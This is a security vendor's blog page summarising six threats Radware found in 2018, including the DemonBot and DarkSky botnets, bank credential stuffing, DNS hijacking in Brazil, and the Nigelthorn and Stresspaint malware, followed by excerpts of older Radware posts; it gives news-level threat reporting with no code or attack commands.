main

BotnetsBrute Force AttacksDDoS AttacksPhishing

Top 6 Threat Discoveries of 2018

December 18, 2018 — by Radware0

AdobeStock_192801212-960x540.jpg

Over the course of 2018, Radware’s Emergency Response Team (ERT) identified several cyberattacks and security threats across the globe. Below is a round-up of our top discoveries from the past year. For more detailed information on each attack, please visit DDoS Warriors.

DemonBot

Radware’s Threat Research Center has been monitoring and tracking a malicious agent that is leveraging a Hadoop YARN (Yet-Another-Resource-Negotiator) unauthenticated remote command execution to infect Hadoop clusters with an unsophisticated new bot that identifies itself as DemonBot.

After a spike in requests for /ws/v1/cluster/apps/new-application appeared in our Threat Deception Network, DemonBot was identified and we have been tracking over 70 active exploit servers that are actively spreading DemonBot and are exploiting servers at an aggregated rate of over 1 million exploits per day.

[You may also like: IoT Botnets on the Rise]

Credential Stuffing Campaign

In October, Radware began tracking a credential stuffing campaign—a subset of Bruce Force attacks—targeting the financial industry in the United States and Europe.

This particular campaign is motivated by fraud. Criminals are using credentials from prior data breaches to gain access to users’ bank accounts. When significant breaches occur, the compromised emails and passwords are quickly leveraged by cybercriminals. Armed with tens of millions of credentials from recently breached websites, attackers will use these credentials, along with scripts and proxies, to distribute their attack against the financial institution to take over banking accounts. These login attempts can happen in such volumes that they resemble a distributed denial-of-service (DDoS) attack.

DNS Hijacking Targets Brazilian Banks

This summer, Radware’s Threat Research Center identified a hijacking campaign aimed at Brazilian Bank customers through their IoT devices, attempting to gain their bank credentials.

The research center had been tracking malicious activity targeting DLink DSL modem routers in Brazil since early June. Through known old exploits dating from 2015, a malicious agent is attempting to modify the DNS server settings in the routers of Brazilian residents, redirecting all their DNS requests through a malicious DNS server. The malicious DNS server is hijacking requests for the hostname of Banco de Brasil (www.bb.com.br) and redirecting to a fake, cloned website hosted on the same malicious DNS server, which has no connection whatsoever to the legitimate Banco de Brasil website.

[You may also like: Financial Institutions Must Protect the Data Like They Protect the Money]

Nigelthorn Malware

In May, Radware’s cloud malware protection service detected a zero-day malware threat at one of its customers, a global manufacturing firm, by using machine-learning algorithms. This malware campaign is propagating via socially-engineered links on Facebook and is infecting users by abusing a Google Chrome extension (the ‘Nigelify’ application) that performs credential theft, cryptomining, click fraud and more.

Further investigation by Radware’s Threat Research group revealed that this group has been active since at least March 2018 and has already infected more than 100,000 users in over 100 countries.

[You may also like: The Origin of Ransomware and Its Impact on Businesses]

Stresspaint Malware Campaign

On April 12, 2018, Radware’s Threat Research group detected malicious activity via internal feeds of a group collecting user credentials and payment methods from Facebook users across the globe. The group manipulates victims via phishing emails to download a painting application called ‘Relieve Stress Paint.’ While benign in appearance, it runs a malware dubbed ‘Stresspaint’ in the background. Within a few days, the group had infected over 40,000 users, stealing tens of thousands Facebook user credentials/cookies.

DarkSky Botnet

In early 2018, Radware’s Threat Research group discovered a new botnet, dubbed DarkSky. DarkSky features several evasion mechanisms, a malware downloader and a variety of network- and application-layer DDoS attack vectors. This bot is now available for sale for less than $20 over the Darknet.

As published by its authors, this malware is capable of running under Windows XP/7/8/10, both x32 and x64 versions, and has anti-virtual machine capabilities to evade security controls such as a sandbox, thereby allowing it to only infect ‘real’ machines.

Read the “IoT Attack Handbook – A Field Guide to Understanding IoT Attacks from the Mirai Botnet and its Modern Variants” to learn more.

Download Now

Brute Force AttacksDDoS AttacksSecurity

A 5 Step Plan on How to Protect Yourself from Cybercrime

June 16, 2014 — by Adrian Crawley32

Recently, I wrote an article for Help Net Security to discuss the modus operandi of cybercriminals and how this can lead to different types of cyber attacks.  While we have previously encountered huge distributed denial of service (DDoS) attacks that appear to come from nowhere and flood the victim’s network security, we have begun to see much more stealth and more sophisticated attacks causing just as much, if not more, damage.

Application SecurityAttack MitigationBotnetsBrute Force AttacksDDoS AttacksHTTP Flood AttacksPhishingSecuritySecurity VirtualizationSEIMWeb Application Firewall

eCrime Congress in Germany: Restoring the Equilibrium of Attackers Vs. Defenders

February 8, 2013 — by Ron Meyran0

Last week, I attended eCrime Congress in Frankfurt, Germany. Held on January 30,Radware was one of the sponsors of the event, which featured a lecture track that ran throughout the day and included breaks for the sponsors’ pavilion.

Application SecurityAttack MitigationBotnetsBrute Force AttacksDDoS AttacksHTTP Flood AttacksSecurity

Shooting From Behind the Fence

February 8, 2013 — by Eyal Benishti0

Can You Stay Anonymous While Participating in a DDoS Attack?
Taking part in a Hacktivist group is completely different than being part of a Botnet. In a Botnet, case participants are unknowingly “recruited” to an attack. In the Hacktivist group, case members take part in attack activities on their own accord.
Just this past month, Anonymous hackers in London were jailed for a series of DDoS attacks on PayPal and other payment services such as Visa and MasterCard.

Application SecurityAttack MitigationBotnetsBrute Force AttacksDDoS AttacksHTTP Flood AttacksPhishingSecuritySecurity VirtualizationSEIMWeb Application Firewall

New Attack Trends – Are You Bringing a Knife to the Gunfight?

January 22, 2013 — by Ziv Gadot0

Today, we launched our 2012 Global Application and Network Security report. It was prepared by our security experts – the Emergency Response Team (ERT) – who’ve seen their fair share of cyber attacks while actively monitoring and mitigating attacks in real-time. In this year’s annual report, our experts have uncovered several new trends in cyber-security worthy of a closer look.

Application SecurityAttack MitigationBotnetsBrute Force AttacksDDoS AttacksHTTP Flood AttacksPhishingSecurity VirtualizationSEIMWeb Application Firewall

Last Week to Participate! Attack Mitigation Black Belt Final Round Begins Today.

July 16, 2012 — by Carl Herberger0

If you’ve been waiting, now’s the time to participate – the last week of Radware’s Attack Mitigation Black Belt Challenge begins today and ends this week. And what a challenge it is! More and more people are participating each week and the leader board has changed hands a number of times – with the standing after the Red Belt challenge resulting in a tie for first place!

Application SecurityAttack MitigationBotnetsBrute Force AttacksDDoS AttacksHTTP Flood AttacksPhishingSecurity VirtualizationSEIMWeb Application Firewall

Calling All Attack Mitigation Experts – Red Belt Round Begins Today!

July 9, 2012 — by Carl Herberger0

Two more weeks left in the Attack Mitigation Black Belt Challenge and congratulations to all who have earned a green belt. As we head into the next round of progressively difficult questions, we have a fierce competition for the Champion. “Brewer” is giving “dh” a run for the money, with only one second separating these first and second place contenders. Check out the Leader Board for the rankings.

Application SecurityAttack MitigationBotnetsBrute Force AttacksDDoS AttacksHTTP Flood AttacksPhishingSecuritySecurity VirtualizationSEIMWeb Application Firewall

Are you ready for your Green Belt in Attack Mitigation?

July 2, 2012 — by Carl Herberger0

Knowledge Test Overview

Wow! The Attack Mitigation Black Belt Challenge is only two weeks old and already we have dueling leaders and intense competition.

People from all over the world are participating in Radware’s first Attack Mitigation Black Belt Challenge and only seven seconds separates the current leader, “dh”, from the fifth place position. It is apparent that some questions were stumbling blocks as we had two questions in the Yellow Belt round that only 10% of the participants could answer properly.

Attack MitigationBotnetsBrute Force AttacksSecurity

From SC Magazine: Roy Zisapel, Radware CEO, Says Flame-Like Vulnerabilities Are Nothing New

June 29, 2012 — by Ronen Kenig0

Yesterday, SC Magazine published an article by Radware’s president and CEO, Roy Zisapel, addressing the infamous Flame malware. Flame stole headlines over the past month, emerging as the most advanced computer virus ever found and a new level of sophistication in cyber warfare.